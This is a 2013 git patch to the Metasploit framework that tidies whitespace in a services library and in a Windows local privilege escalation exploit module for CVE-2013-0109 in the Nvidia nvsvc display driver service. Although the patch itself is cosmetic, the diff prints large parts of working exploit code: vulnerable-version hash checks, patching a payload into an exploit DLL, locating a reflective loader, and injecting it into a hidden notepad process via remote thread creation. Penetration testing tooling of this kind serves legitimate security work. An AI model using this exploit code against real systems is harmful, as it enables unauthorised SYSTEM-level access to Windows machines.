From 819ba30a3331896409a2e482a9476611b6df5cde Mon Sep 17 00:00:00 2001
From: Meatballs
Date: Fri, 5 Jul 2013 22:35:22 +0100
Subject: [PATCH] msftidy
Conflicts:
 lib/msf/core/post/windows/services.rb
---
 lib/msf/core/post/windows/services.rb | 4 +-
 .../exploits/windows/local/nvidia_nvsvc.rb | 102 +++++++++--------
 2 files changed, 53 insertions(+), 53 deletions(-)
diff --git a/lib/msf/core/post/windows/services.rb b/lib/msf/core/post/windows/services.rb
index 786487b353..2893e9b640 100644
--- a/lib/msf/core/post/windows/services.rb
+++ b/lib/msf/core/post/windows/services.rb
@@ -292,7 +292,7 @@ module Services
 # Now to grab a handle to the service.
 # Thank you, Wine project for defining the DELETE constant since it,
 # and all its friends, are missing from the MSDN docs.
- # #define DELETE 0x00010000
+ # #define DELETE 0x00010000
 handle = adv.OpenServiceA(manager, name, 0x10000)
 if (handle["return"] == 0)
 raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
@@ -312,7 +312,7 @@ module Services
 #
 # @param (see #service_start)
 #
- # @return {} representing lpServiceStatus
+ # @return {} representing lpServiceStatus
 #
 # @raise (see #service_start)
 #
diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb
index f9a5121c8a..eef3e92e05 100644
--- a/modules/exploits/windows/local/nvidia_nvsvc.rb
+++ b/modules/exploits/windows/local/nvidia_nvsvc.rb
@@ -22,40 +22,40 @@ class Metasploit3 < Msf::Exploit::Local
 def initialize(info={})
 super(update_info(info, {
- 'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
- 'Description' => %q{
+ 'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
+ 'Description' => %q{
 The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user can interact with the service. The service has a stacked based buffer overflow as a result of a memmove operation.
-
+
 N.B. exe is nvvsvc.exe, service is nvsvc and pipe is nsvr! This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012. It has been tested on Win7 x64 against nvvsvc.exe dated Dec 1 2012.
 },
- 'License' => MSF_LICENSE,
- 'Author' =>
+ 'License' => MSF_LICENSE,
+ 'Author' =>
 [
 'Peter Wintersmith', # Original exploit
 'Ben Campbell ', # Metasploit integration
 ],
- 'Arch' => ARCH_X86_64,
- 'Platform' => 'win',
- 'SessionTypes' => [ 'meterpreter' ],
+ 'Arch' => ARCH_X86_64,
+ 'Platform' => 'win',
+ 'SessionTypes' => [ 'meterpreter' ],
 'DefaultOptions' => { 'EXITFUNC' => 'thread', },
- 'Targets' =>
+ 'Targets' =>
 [ [ 'Automatic', { } ] ],
- 'Payload' =>
+ 'Payload' =>
 { 'Space' => 2048, 'DisableNops' => true },
- 'References' =>
+ 'References' =>
 [ [ 'CVE', '2013-0109' ], [ 'OSVDB', '88745' ],
@@ -87,14 +87,14 @@ class Metasploit3 < Msf::Exploit::Local
 rescue RuntimeError => e
 print_error("Unable to retrieve service status")
 end
-
+
 if sysinfo['Architecture'] =~ /WOW64/i
 # Unable to check the file in System32 (Need to add a DisableWOW64FSRedirection option to meterp!)
 return Exploit::CheckCode::Detected
 else
 path = svc['Command'].strip
 end
-
+
 begin
 hash = client.fs.file.md5(path).unpack('H*').first
 rescue Rex::Post::Meterpreter::RequestError => e
@@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Local
 if vuln_hashes.include?(hash)
 vprint_good("Hash '#{hash}' is listed as vulnerable")
 return Exploit::CheckCode::Vulnerable
- else
+ else
 vprint_status("Hash '#{hash}' is not recorded as vulnerable")
 return Exploit::CheckCode::Detected
 end
@@ -115,20 +115,20 @@ class Metasploit3 < Msf::Exploit::Local
 end
 end
- def create_proc
- windir = expand_path("%windir%")
- cmd = "#{windir}\\system32\\notepad.exe"
- return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid
- end
-
+ def create_proc
+ windir = expand_path("%windir%")
+ cmd = "#{windir}\\system32\\notepad.exe"
+ return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid
+ end
+
 def is_running?
- begin
- status = service_status('nvsvc')
+ begin
+ status = service_status('nvsvc')
 return (status and status[:state] == 4)
- rescue RuntimeError => e
- print_error("Unable to retrieve service status")
+ rescue RuntimeError => e
+ print_error("Unable to retrieve service status")
 return false
- end
+ end
 end
@@ -147,40 +147,40 @@ class Metasploit3 < Msf::Exploit::Local
 else
 print_good("Service is running")
 end
-
- dll = ''
- offset = nil
- file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll")
- File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) }
- pay = payload.encoded
+ dll = ''
+ offset = nil
+ file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll")
+ File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) }
- bo = dll.index('PAYLOAD:')
- raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo
- dll[bo, pay.length] = [pay].pack("a*")
+ pay = payload.encoded
- pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
+ bo = dll.index('PAYLOAD:')
+ raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo
+ dll[bo, pay.length] = [pay].pack("a*")
- pe.exports.entries.each do |entry|
- if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
- offset = pe.rva_to_file_offset( entry.rva )
- break
- end
- end
+ pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
- print_error("No offset found") unless offset
+ pe.exports.entries.each do |entry|
+ if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
+ offset = pe.rva_to_file_offset( entry.rva )
+ break
+ end
+ end
- new_pid = create_proc
+ print_error("No offset found") unless offset
- if not new_pid
- fail_with(Exploit::Failure::Unknown, "Failed to create a new process")
- end
+ new_pid = create_proc
- vprint_status("Injecting payload into memory")
- host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS)
- mem = host_process.memory.allocate(dll.length + (dll.length % 1024))
- host_process.memory.protect(mem)
- host_process.memory.write(mem, dll)
+ if not new_pid
+ fail_with(Exploit::Failure::Unknown, "Failed to create a new process")
+ end
+
+ vprint_status("Injecting payload into memory")
+ host_process = session.sys.process.open(new_pid.to_i, 
PROCESS_ALL_ACCESS)
+ mem = host_process.memory.allocate(dll.length + (dll.length % 1024))
+ host_process.memory.protect(mem)
+ host_process.memory.write(mem, dll)
 print_status("Executing exploit...")
 host_process.thread.create(mem+offset)
 end